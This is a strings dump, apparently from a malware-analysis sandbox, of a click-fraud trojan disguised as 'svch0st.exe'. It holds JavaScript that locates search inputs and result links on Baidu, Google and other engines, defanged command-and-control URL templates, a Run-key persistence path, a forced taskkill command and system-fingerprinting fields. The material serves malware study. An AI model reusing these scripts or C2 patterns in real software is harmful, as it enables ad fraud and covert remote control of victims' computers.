function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_3188_rwx_00081000_00110000:

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

svch0st.exe_3188_rwx_00193000_00001000:

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHELL32.dll

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

RegCloseKey

CertOpenStore

SHDeleteKeyW

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_3188_rwx_69751000_00001000:

(Bv.SCv=kAv

JSCRIPT9.dll

svch0st.exe_3188_rwx_69911000_00001000:

Bv.SCv

BvsuAv.TBv(JBv

.wcg-w

svch0st.exe_3188_rwx_6D351000_00001000:

>mInvalid parameter passed to C runtime function.

svch0st.exe_3188_rwx_6DA01000_00001000:

'i' is only supported with debug builds.

*** %s%ls%sSource: `%ls:%ld`

vsStageData.Color = Diffuse;

vsStageData.UV = UV;

float2 inputUV = vsStageData.UV;

vsStageData.UV.x = inputUV.x*mat3x2TextureTransform0[0]   inputUV.y*mat3x2TextureTransform0[1]   mat3x2TextureTransform0[2];

vsStageData.UV.y = inputUV.x*mat3x2TextureTransform1[0]   inputUV.y*mat3x2TextureTransform1[1]   mat3x2TextureTransform1[2];

vsStageData.Color = Color;

BlendColor = vsStageData.Color;

Diffuse = vsStageData.Color;

uv = vsStageData.UV;

halfTexelSizeNormalized_and_vCoord = Data_halfTexelSizeNormalized_and_vCoord;

halfTexelSizeNormalized_and_vCoord_and_gradientSpanNormalized = Data_halfTexelSizeNormalized_and_vCoord_and_gradientSpanNormalized;

gradOrigin_and_firstTexelRegionCenter = Data_gradOrigin_and_firstTexelRegionCenter;

USERProcessHandleQuota

GDIProcessHandleQuota

kernel32.dll

Software\Microsoft\Avalon.Graphics

d:\win7sp1_gdr\windows\wgi\shared\util\utillib\debugbreak.cpp

svch0st.exe_3188_rwx_6DFC1000_00002000:

.wb\-w

.wH2-w

.wq -w;

Bv.TBv2

D:(A;;GA;;;SY)(A;;0x%x;;;%s)S:(ML;;1;;;LW)

Prop%d

FEATURE_URLFILE_CACHEFLUSH_KB936881

svch0st.exe_3188_rwx_6E981000_00001000:

d:\w7rtm\base\diagnosis\pdi\pdh\pdhdll\query.c

d:\w7rtm\base\diagnosis\pdi\pdh\pdhlog\log.c

SOFTWARE\Microsoft\Windows NT\CurrentVersion\PDH

svch0st.exe_3188_rwx_6F9D1000_00001000:

Ew.AEw

RCv=kAv.SCvs

KERNELBASE.DLL

svch0st.exe_3196:

`.rsrc

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

.MD{#

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

